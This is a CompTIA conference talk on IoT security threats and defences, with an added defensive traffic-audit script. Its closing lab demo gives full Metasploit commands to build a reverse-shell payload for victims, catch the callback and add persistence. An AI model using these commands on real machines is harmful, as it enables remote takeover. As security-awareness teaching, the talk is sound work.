This is the presentation that I delivered at InfoSec Netherlands. In the era of Digital Transformation, organisations are finding efficiencies by deploying systems and devices that are always connected - dubbed the Internet of Things (IoT). If these 'things' are not carefully configured and maintained then they are a threat to your business. I discussed the common weaknesses that attackers exploit on IoT systems and the cybersecurity skills that you need to mitigate them. The session also included a live attack to demonstrate how a device can become compromised.
Protecting your Organisation from the Internet of Evil Things
2. Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
The Voice of the World’s IT Industry and over 1.5 million IT Professionals
✓ Higher Salaries
✓ Growing Demand
✓ Verified Strengths
✓ Universal Skills
▪ CERTIFICATIONS: Largest Provider of Vendor-Neutral IT Certifications
– “Three of the ‘Top 10 Certifications That Help IT Workers Get Jobs’ are CompTIA certifications.”*
▪ ASSOCIATION: 4,000+ IT Channel Providers & Partners
– A non-profit trade association with more than 4,000 members and business partners. Our members drive our programs through their participation in CompTIA communities, research studies, events, sharing of best practices and more.
▪ PHILANTHROPY: Creating IT Futures Foundation
– A 501(c)(3) charitable organization that creates on-ramps for successful IT careers, serving individuals who are underrepresented in IT and lacking in opportunities to be successful in IT, including veterans, youth, and the unemployed.
▪ ADVOCACY: Public Policy & Reform
– Our advocacy division encourages collaboration and advancing of legislation that allows the private sector to develop new products and services, find solutions and sell them in the global marketplace.
* Source: The Dice Report, February 2012
Zeshan Sattar
From Cybernetics to Cybersecurity
2004
• BSc Cybernetics & Virtual Worlds
• IT Support Tech, UK & Japan
2007
• Systems Administrator
• Technical Trainer, Europe
2013
• IT Expert Consultant, Worldwide
• Head of Curriculum
2015
• Certification Evangelist
Agenda
▪ Introduction
▪ What is IoT?
▪ What is IoET?
▪ Examples of Cyber attacks
▪ Human error
▪ CompTIA certifications
▪ Guided Demo: Compromising a Windows client
What is the Internet of Things?
The Internet of things (IoT) is the inter-networking of physical devices, vehicles (also referred to as "connected devices" and "smart devices")
Which simply means…
Everything Has Become Connected
[Diagram: The Internet, connected to Smart Car, Smart Suit, Smart House, Tablet, Smart Phone, Desktop/Laptop, Smart Shoes, Internet CCTV, Smart Watch, Smart Cities]
What is the Internet of Things?
▪ The main problem is that because the idea of networking appliances and
other objects is relatively new, security has not always been considered in
product design.
▪ Consumers often fail to change the default passwords on smart devices or if
they do change them, fail to select sufficiently strong passwords.
The Concerns
▪ 70% of the most commonly used IoT devices contain vulnerabilities involving password security,
permissions and encryption
▪ A number of IoT devices available today have defaulted to the lowest hanging fruit for security &
authentication: passwords. Passwords are bad and a disaster for the web & IoT, for many reasons.
▪ Application-level security:
– Default admin passwords
– Weak passwords
– Not using encryption over the network
– Open ports
▪ Protocol-level security:
– Wireless protocols such as ZigBee & Bluetooth
The Internet of Evil Things
What is the Internet of Evil Things?
▪ It is the Internet of Things, but used in a negative way to hurt you.
▪ By detecting vulnerabilities, attackers can control your:
– Car, house, phone, computer
– Your identity can be stolen, you can be killed, you can be blackmailed
– You can end up in jail because of an attack that took place while you were asleep
Examples of IoT devices
The accessible IoT devices
The Problems?
▪ Limited CPU on devices
▪ Encryption & identity keys
▪ New devices with new OS/software
▪ Too much network traffic
▪ Wi-Fi connected home appliances
▪ GUI & Internet Browsers
▪ Hardware Trojans
Cyber Attack Examples
What is Mirai?
▪ Mirai is the Japanese word for Future.
▪ In IT, it is malware that remotely attacks out-of-date Linux devices
▪ It takes control of the devices and turns them into a botnet for further attacks
▪ It scans the internet looking for IP addresses of IoT devices.
▪ Some of the popular websites affected were: GitHub, Twitter, Reddit, Netflix, Airbnb
▪ BASHLITE is another malware that performs a DDoS attack on Linux systems
More about Mirai
▪ On the 21st of October 2016, a Mirai-fueled zombie botnet army was deployed on Dyn.
▪ Dyn is one of the world’s largest DNS providers
▪ The attack resulted in taking down internet access in many of America’s largest cities.
▪ Mirai gave us a view of how the IoT can turn into an IoET by controlling many devices and maybe shutting them down
Mirai – one year on…
▪ 66% of IT Pros said they either haven’t checked or don’t know how to
check their devices for Mirai
▪ 20% said their IoT devices were hit with ransomware attacks last year.
▪ 16% of respondents say they experienced man-in-the-middle attacks
through IoT devices.
▪ 23% of IT security professionals monitor connected devices coming into
their offices
Source: Pwnie Express
The Onion Routing (TOR)
▪ Onion routing is a technique for anonymous communication over a
computer network. In an onion network, messages are encapsulated in
layers of encryption, analogous to layers of an onion. ... When the final layer
is decrypted, the message arrives at its destination.
▪ Tor aims to conceal its users' identities and their online activity from
surveillance and traffic analysis by separating identification and routing.
▪ It is an implementation of onion routing, which encrypts and then randomly
bounces communications through a network of relays run by volunteers
around the globe
Ransomware
Steps to Ransomware
1. Infected file or Email link to a page
2. User redirected to Site
3. File Downloaded to the system
4. File Installed
5. User Data Encrypted
6. Pay or Pay
WannaCry
▪ WannaCry Ransomware
▪ One of the most widespread pieces of malware
▪ Built on “Eternal Blue”, developed by the NSA
▪ Supposedly weaponized by North Korea
▪ This Ransomware is still spreading
Top 10 IoT Vulnerabilities
1. Insecure Web Interface
2. Insufficient Authentication/Authorization
3. Insecure Network Services
4. Lack of Transport Encryption/Integrity Verification
5. Privacy Concerns
6. Insecure Cloud Interface
7. Insecure Mobile Interface
8. Insufficient Security Configurability
9. Insecure Software/Firmware
10. Poor Physical Security
Source: OWASP
Shodan.io
Some Dangerous Apps
▪ Flashlight
▪ Tinder
▪ Snapchat
▪ Blendr
▪ Whisper
▪ Yik Yak
▪ Poof
▪ Omegle
▪ Clean it
▪ Deep Clean
▪ Flappy Cat
▪ Light VPN
▪ DU battery Saver & Fast Charge
▪ Lazy Listen audiobook
▪ Kik Messenger
▪ Whatsapp Bomber
▪ Quick Pic
▪ ES File Explorer
▪ UC Browser
▪ Dolphin Web Browser
▪ Clean Master
▪ Whale Camera
▪ Blinking Camera
▪ File Master
▪ Art Camera
Sample Malware / Virus Codes available on GitHub
(for Research)
▪ Ransomware Code
▪ Worm Code
▪ Virus Code
▪ Mirai Slice Code
▪ Batch File Code
▪ DoS Code
How would a HACKER use IoT against you?
Hacking Steps
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Covering Tracks
To protect against a hacker, you have to think like a hacker
How would a HACKER use IoT against you?
▪ Blackmail
– What Happened?
▪ Identity Theft / 419 Scam
– Why do they need it?
▪ Phishing
– What info are they looking for?
▪ Health Reports
– What do they do with it?
Quick Tip
The Solutions?
▪ IoT security opens new gates for security professionals to develop security solutions
▪ Network Security:
– How many devices transfer unencrypted data?
– What are these devices?
– Which are most active?
▪ User Security:
– Do you need that software?
– Is it trustworthy?
– Is it from the vendor?
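One way to answer the three network-security questions above from flow records, as an added example that is not part of the original slides. The record format, the device addresses and the list of cleartext ports are assumptions constructed for illustration.

```python
from collections import defaultdict

# Assumption: destination ports of protocols that carry data unencrypted by default.
CLEARTEXT_PORTS = {21: "ftp", 23: "telnet", 80: "http", 1883: "mqtt"}

# Constructed sample flow records: "src_ip dst_ip dst_port bytes" (hypothetical format).
SAMPLE_FLOWS = """\
192.168.2.21 203.0.113.5 23 1200
192.168.2.21 203.0.113.5 443 90000
192.168.2.22 198.51.100.7 1883 400
192.168.2.22 198.51.100.7 1883 600
192.168.2.23 198.51.100.9 443 5000
192.168.2.24 203.0.113.8 80 30000
malformed line
"""

def parse_flows(text):
    """Yield (src, dst_port, bytes) tuples, skipping malformed records."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or not (parts[2].isdigit() and parts[3].isdigit()):
            continue
        yield parts[0], int(parts[2]), int(parts[3])

def audit(text):
    """Summarise, per source device, cleartext traffic and total activity."""
    clear = defaultdict(lambda: {"bytes": 0, "protocols": set()})
    total = defaultdict(int)
    for src, port, size in parse_flows(text):
        total[src] += size
        if port in CLEARTEXT_PORTS:
            clear[src]["bytes"] += size
            clear[src]["protocols"].add(CLEARTEXT_PORTS[port])
    # Most active first, so the busiest devices are reviewed first.
    ranked = sorted(total, key=lambda d: total[d], reverse=True)
    return {
        "cleartext_device_count": len(clear),                       # how many?
        "cleartext_devices": {d: sorted(v["protocols"]) for d, v in clear.items()},
        "cleartext_bytes": {d: v["bytes"] for d, v in clear.items()},
        "most_active": ranked,                                      # which are most active?
    }

if __name__ == "__main__":
    report = audit(SAMPLE_FLOWS)
    print("Devices sending unencrypted data:", report["cleartext_device_count"])
    for dev, protos in report["cleartext_devices"].items():
        print(f"  {dev}: {', '.join(protos)} ({report['cleartext_bytes'][dev]} bytes)")
    print("Most active devices:", report["most_active"])
```

A port match only flags a candidate: a device can run TLS on port 80 or cleartext on a non-standard port, so flagged devices still need a packet-level check.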
Guided Demo of an Attack
▪ How can you simulate this at home?
– Virtualization Software (Hyper-V, VMware Player, VirtualBox)
– Kali Linux
– Windows client
– Tip: set up a Windows Server VM to provide DHCP to the virtual
network and use an isolated VM network
The attack performed here is for Demonstration, Awareness and Educational
purposes. Performing the same is at your own Risk.
Commands to the demo (1/3)
▪ On the Kali Linux VM, open a terminal window and type the following
command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.10 LPORT=4444 -f exe > exploit.exe
▪ This command creates the exploit.exe and stores it in the Home folder ready
for you to distribute to the victims (USB, email, web link etc.)
▪ The IP address is of your Kali VM
▪ Then launch Metasploit by typing the following command:
msfconsole
Commands to the demo (2/3)
▪ Now, we will configure the Kali VM to listen for the user to launch the
exploit, by typing:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.10
set LPORT 4444
exploit -j -z
▪ Your Kali VM is now ready for the attack to happen. On your Windows client,
double click the exploit.exe
▪ You will notice that the Kali VM receives the connection
Commands to the demo (3/3)
▪ We can now interact with the connecting machine by typing:
sessions -i 1
▪ We want to ensure that if the user logs off/restarts the machine, we can
reconnect. This can be done by adding persistence:
run persistence -U -i 5 -p 4444 -r 192.168.2.10
▪ We now have full control of the system and can carry out various commands.
The commands that you can use, can be viewed by typing:
help
▪ Enjoy hacking!